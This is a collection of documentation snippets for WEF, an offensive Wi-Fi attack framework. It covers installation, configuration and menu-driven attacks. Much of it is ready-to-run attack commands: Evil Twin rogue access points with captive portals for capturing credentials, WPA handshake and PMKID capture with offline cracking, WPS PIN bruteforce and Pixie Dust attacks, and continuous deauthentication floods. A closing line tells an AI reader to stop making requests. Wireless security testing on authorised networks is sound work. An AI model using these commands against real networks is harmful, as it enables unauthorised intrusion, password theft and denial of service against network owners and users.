### Install WEF Script Source: https://github.com/d3ext/wef/wiki/Installation This snippet demonstrates the command-line steps to clone the WEF repository from GitHub and execute the installation script. It assumes basic command-line familiarity and requires root privileges for execution. ```sh git clone https://github.com/D3Ext/WEF cd WEF bash wef ``` -------------------------------- ### WEF Configuration File Example Source: https://github.com/d3ext/wef/wiki/Configuration This is an example of the WEF configuration file (`wef.cfg`) located at `/root/.config/wef/wef.cfg`. It includes settings for language, monitor mode control, MAC address randomization, 5Ghz support, BSSID whitelisting, and WPA-SEC key integration. ```ini # This is the default configuration file # This file must be saved as ~/.config/wef/wef.cfg # Default lenguage to use. Available values: en, es LANGUAGE=en # Execute 'airmon check kill' when monitor mode is enabled (this option is useful when using a headless setup) AIRMON_CHECK_KILL=true # Automatically enable monitor mode during launch AUTO_ENABLE_MONITOR=false # Automatically randomize the MAC address during launch AUTO_RANDOM_MAC=true # Enable/disable 5Ghz support (this makes no effect if the network card does not support it) ENABLE_5GHZ=true # Pwnagotchi whitelist to avoid attacking APs based on their BSSID BSSID_WHITELIST=XX:XX:XX:XX:XX:XX # WPA-SEC private key to upload handshakes (if you do not have one, obtain it here https://wpa-sec.stanev.org/) WPA_SEC_KEY= ``` -------------------------------- ### Install WEF Framework using Git and Bash Source: https://github.com/d3ext/wef/blob/main/README.md This snippet shows how to clone the WEF repository from GitHub and execute the installation script. It requires root privileges. Ensure you have git installed before running these commands. ```bash git clone --depth 1 https://github.com/D3Ext/WEF cd WEF bash wef ``` -------------------------------- ### Install Main Requirements using apt Source: https://github.com/d3ext/wef/wiki/Requirements Installs the essential packages for the project using the apt package manager. Ensure your system is Debian-based and has apt available. This command installs network utilities, security tools, and text processing tools. ```sh apt install iproute2 iw macchanger aircrack-ng mdk4 reaver xterm gawk sed jq pciutils usbutils ethtool bsdmainutils curl procps ``` -------------------------------- ### Install Main Requirements using pacman Source: https://github.com/d3ext/wef/wiki/Requirements Installs the essential packages for the project using the pacman package manager. This is typically used on Arch Linux and its derivatives. The command lists core networking, security, and utility tools. ```sh pacman -S iproute2 iw macchanger aircrack-ng mdk4 reaver xterm awk sed jq pciutils usbutils ethtool util-linux curl procps-ng ``` -------------------------------- ### Install Optional Requirements using apt Source: https://github.com/d3ext/wef/wiki/Requirements Installs optional packages required for advanced attacks like Evil Twin or PMKID, using the apt package manager. This command installs tools for password cracking, network analysis, and web serving. ```sh apt install john hashcat hcxtools hcxdumptool pixiewps hostapd hostapd-wpe dnsmasq lighttpd bettercap ``` -------------------------------- ### Cloning and Running WEF Framework (Bash) Source: https://context7.com/d3ext/wef/llms.txt Instructions to clone the WEF repository from GitHub and execute the main Bash script. Requires root privileges to run. The framework can be started with a specific network interface using the -i flag. ```bash # Clone and run as root git clone --depth 1 https://github.com/D3Ext/WEF cd WEF bash wef # Start with specific interface wef -i wlan0 # Help information wef --help ``` -------------------------------- ### Install Main Requirements using dnf Source: https://github.com/d3ext/wef/wiki/Requirements Installs the essential packages for the project using the dnf package manager, common on Fedora and related distributions. Note that some packages might not be available. This command covers essential network and security tools. ```sh dnf install iproute iw macchanger aircrack-ng reaver xterm gawk sed jq pciutils lsusb ethtool util-linux curl procps-ng ``` -------------------------------- ### Install Optional Requirements using dnf Source: https://github.com/d3ext/wef/wiki/Requirements Installs optional packages for advanced attacks using the dnf package manager. Availability of packages may vary. This command installs tools for cracking, network exploitation, and supporting services. ```sh dnf install john hashcat hcxtools hcxdumptool pixiewps hostapd hostapd-wpe dnsmasq lighttpd bettercap ``` -------------------------------- ### Launch WEP Access Point with hostapd-wpe (Shell) Source: https://github.com/d3ext/wef/blob/main/lib/wep-ap/README.md Starts the hostapd-wpe service to launch the WEP access point. Requires a pre-configured 'hostapd.conf' file. Ensure the configuration is appropriate for your network setup. ```sh hostapd-wpe hostapd.conf ``` -------------------------------- ### Install Optional Requirements using pacman Source: https://github.com/d3ext/wef/wiki/Requirements Installs optional packages for advanced attacks using the pacman package manager. Some packages may not be available depending on the specific distro. This includes password cracking, network attack, and service tools. ```sh pacman -S john hashcat hcxtools hcxdumptool pixiewps hostapd hostapd-wpe dnsmasq lighttpd bettercap ``` -------------------------------- ### Launch DNS Server with dnsmasq (Shell) Source: https://github.com/d3ext/wef/blob/main/lib/wep-ap/README.md Starts the dnsmasq service to provide DNS and DHCP services for the access point. Requires a pre-configured 'dnsmasq.conf' file. This is essential for clients to connect and resolve network names. ```sh dnsmasq -C dnsmasq.conf ``` -------------------------------- ### Evil Twin Attack Setup (Bash) Source: https://context7.com/d3ext/wef/llms.txt Configuring and launching an Evil Twin attack using WEF. This involves setting up a rogue access point with a captive portal to capture user credentials, leveraging `hostapd`, `dnsmasq`, and `lighttpd`. ```bash # In WEF menu, select Evil Twin attack # Four modes available: # 1. Rogue AP + Captive Portal # 2. Rogue AP + Captive Portal + DoS # 3. Rogue AP + Captive Portal + WPA Enterprise # 4. Rogue AP + Captive Portal + WPA Enterprise + DoS # Recommended: Mode 2 for most effective attack # Configure options: # - Enable BSSID spoofing (clone target MAC) # - Select captive portal template (en/es/fr/de/etc) # - Enable password verification with handshake # - Enable KARMA mode (optional) # Attack setup creates: # - hostapd rogue AP on target channel # - dnsmasq for DHCP/DNS services # - lighttpd web server for captive portal # - aireplay-ng for deauth (if DoS enabled) ``` -------------------------------- ### Run WEF Framework with specified interface Source: https://github.com/d3ext/wef/blob/main/README.md This command demonstrates the common usage of the WEF framework, specifying the network interface to be used. Replace 'wlan0' with your actual network interface name. This command initiates the framework's operations on the specified interface. ```bash wef -i wlan0 ``` -------------------------------- ### Build and Run WEF Docker Container Source: https://github.com/d3ext/wef/wiki/FAQ Instructions for building a Docker image for WEF and running it as a container. This method allows for isolated execution of WEF, sharing the host's network adapter for network access. ```sh docker build --tag 'wef' . docker run --rm -it --privileged --net=host wef ``` -------------------------------- ### Display WEF Framework Help Panel Source: https://github.com/d3ext/wef/blob/main/README.md This command is used to display the help panel for the WEF framework, providing information about available options and parameters. It's useful for understanding the command-line arguments and functionalities offered by the tool. ```bash wef -h ``` -------------------------------- ### WEF Configuration File Settings (Bash) Source: https://context7.com/d3ext/wef/llms.txt Defines default configuration parameters for the WEF framework, stored in `~/.config/wef/wef.cfg`. Settings include language, process killing, monitor mode, MAC randomization, 5GHz support, and API keys. ```bash # Default configuration settings LANGUAGE=en # Available: en, es AIRMON_CHECK_KILL=true # Kill interfering processes AUTO_ENABLE_MONITOR=false # Auto enable monitor mode on start AUTO_RANDOM_MAC=true # Randomize MAC automatically ENABLE_5GHZ=true # Enable 5GHz support BSSID_WHITELIST=XX:XX:XX:XX:XX:XX # Pwnagotchi mode whitelist WPA_SEC_KEY= # WPA-SEC API key for online cracking ``` -------------------------------- ### Monitor Mode Management (Bash) Source: https://context7.com/d3ext/wef/llms.txt Commands for managing network interface monitor mode using `airmon-ng` and `iwconfig`. WEF automates monitor mode activation and deactivation, but manual control is also possible. ```bash # Enable monitor mode on interface airmon-ng start wlan0 # The framework automatically manages monitor mode # Use 'enable' command inside WEF to activate # Use 'disable' command to revert to managed mode # Check current interface status iwconfig wlan0 ``` -------------------------------- ### Check for Virtual Interface Support (Shell) Source: https://github.com/d3ext/wef/blob/main/lib/wep-ap/README.md Verifies if the network adapter supports Virtual Interfaces (VIF), specifically the AP/VLAN mode, which is required for splitting the interface. ```sh iw list | grep "Supported interface modes" -A 8 | grep "AP/VLAN" ``` -------------------------------- ### Convert HTML Reports to PDF Source: https://github.com/d3ext/wef/wiki/FAQ Demonstrates how to convert generated HTML reports to PDF format using the `wkhtmltopdf` command-line tool. This is a straightforward conversion process for archiving or sharing reports. ```sh wkhtmltopdf report.html report.pdf ``` -------------------------------- ### PMKID Attack and Cracking (Bash) Source: https://context7.com/d3ext/wef/llms.txt Procedure for capturing PMKID using `hcxdumptool` within WEF for offline cracking with `hashcat`. This method bypasses the need for client interaction or deauthentication. ```bash # In WEF menu, select PMKID attack option # No deauthentication required - passive capture # Attack captures PMKID directly from AP # Output: /tmp/wef/output/pmkid.pcapng # Convert and crack with hashcat hcxdumptool -o pmkid.hash /tmp/wef/output/pmkid.pcapng hashcat -m 22000 pmkid.hash wordlist.txt ``` -------------------------------- ### WPS PIN Bruteforce Attack (Bash) Source: https://context7.com/d3ext/wef/llms.txt Initiating a WPS PIN bruteforce attack via WEF. This method systematically tests all possible WPS PIN combinations to gain access to the network, utilizing `reaver`. ```bash # Select WPS PIN Bruteforce from menu # Choose target AP with WPS enabled # Framework executes: # reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv # Attack duration: hours to days depending on AP # Rate limiting may slow attack # Results written to reaver output file ``` -------------------------------- ### Initiate Online Handshake Cracking Source: https://github.com/d3ext/wef/wiki/FAQ Commands for using WEF's online handshake cracking feature with WPA-SEC. It includes uploading a capture file for cracking and checking the status of previously submitted handshakes. ```sh crack_online check_online ``` -------------------------------- ### Check Network Adapter VIF Support Source: https://github.com/d3ext/wef/wiki/FAQ Command to check if a network adapter supports Virtual Interface (VIF) capabilities, specifically 'AP/VLAN' mode, which is crucial for certain attacks like EvilTwin. This helps in diagnosing potential issues related to Wi-Fi adapter functionality. ```sh sudo iw list | grep "Supported interface modes" -A 8 ``` -------------------------------- ### Split Network Interface (Shell) Source: https://github.com/d3ext/wef/blob/main/lib/wep-ap/README.md Splits a network interface into two, one for hosting the AP and another for monitoring. This involves changing the interface mode to monitor and creating a new virtual interface with a random MAC address. Assumes 'wlan0' is the interface name. ```sh interface="wlan0" rand_mac="f2:11:56:8c:1a:68" ip link set "$interface" down iw "$interface" set monitor control ip link set "$interface" up iw "$interface" interface add "mon${interface}" type monitor addr ${rand_mac} ``` -------------------------------- ### WPA/WPA2 Handshake Capture and Cracking (Bash) Source: https://context7.com/d3ext/wef/llms.txt Steps to capture the 4-way handshake for WPA/WPA2 networks using WEF and then crack it offline with `aircrack-ng`. Requires selecting the target AP and initiating a deauthentication attack within WEF. ```bash # Start WEF and select target AP wef -i wlan0 # In WEF menu: # 1. Select option 12 (WPA handshake attack) # 2. Scan for networks # 3. Select target AP # 4. Choose deauth option to force handshake # 5. Wait for handshake capture # Captured handshakes stored in: /tmp/wef/output/ # Crack handshake offline with aircrack-ng aircrack-ng -w /path/to/wordlist.txt /tmp/wef/output/handshake-01.cap ``` -------------------------------- ### Revert Interface Split (Shell) Source: https://github.com/d3ext/wef/blob/main/lib/wep-ap/README.md Reverts the changes made to split the network interface. This command deletes the virtual monitor interface and resets the original interface back to managed mode. ```sh iw "mon${interface}" del ifconfig "$interface" down iwconfig "$interface" mode managed ifconfig "$interface" up ``` -------------------------------- ### WPS Pixie Dust Attack (Bash) Source: https://context7.com/d3ext/wef/llms.txt Using WEF to perform a Pixie Dust attack against WPS-enabled networks. This exploits a vulnerability in the WPS implementation to recover the WPA/WPA2 password directly, using `reaver`. ```bash # In WEF menu: # Select option 7 (Pixie Dust attack) # Scan for WPS-enabled networks # Select target AP with WPS enabled # Framework uses reaver with pixie dust option: # reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K # Successful attack reveals: # - WPS PIN # - WPA/WPA2 password in plaintext # Output saved to: /tmp/wef/output/reaver_output.txt ``` -------------------------------- ### Deauthentication Attack (Bash) Source: https://context7.com/d3ext/wef/llms.txt Executing a deauthentication attack using WEF, often employed to disconnect clients from an access point. This can be used independently or as part of a handshake capture process, using `aireplay-ng`. ```bash # Can be used standalone or with handshake capture # In WEF menu, select DoS attack option # Choose deauthentication attack # Select target AP and optional client MAC # Sends continuous deauth frames: # aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon # Use Ctrl+C to stop attack # Useful for forcing handshake captures ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.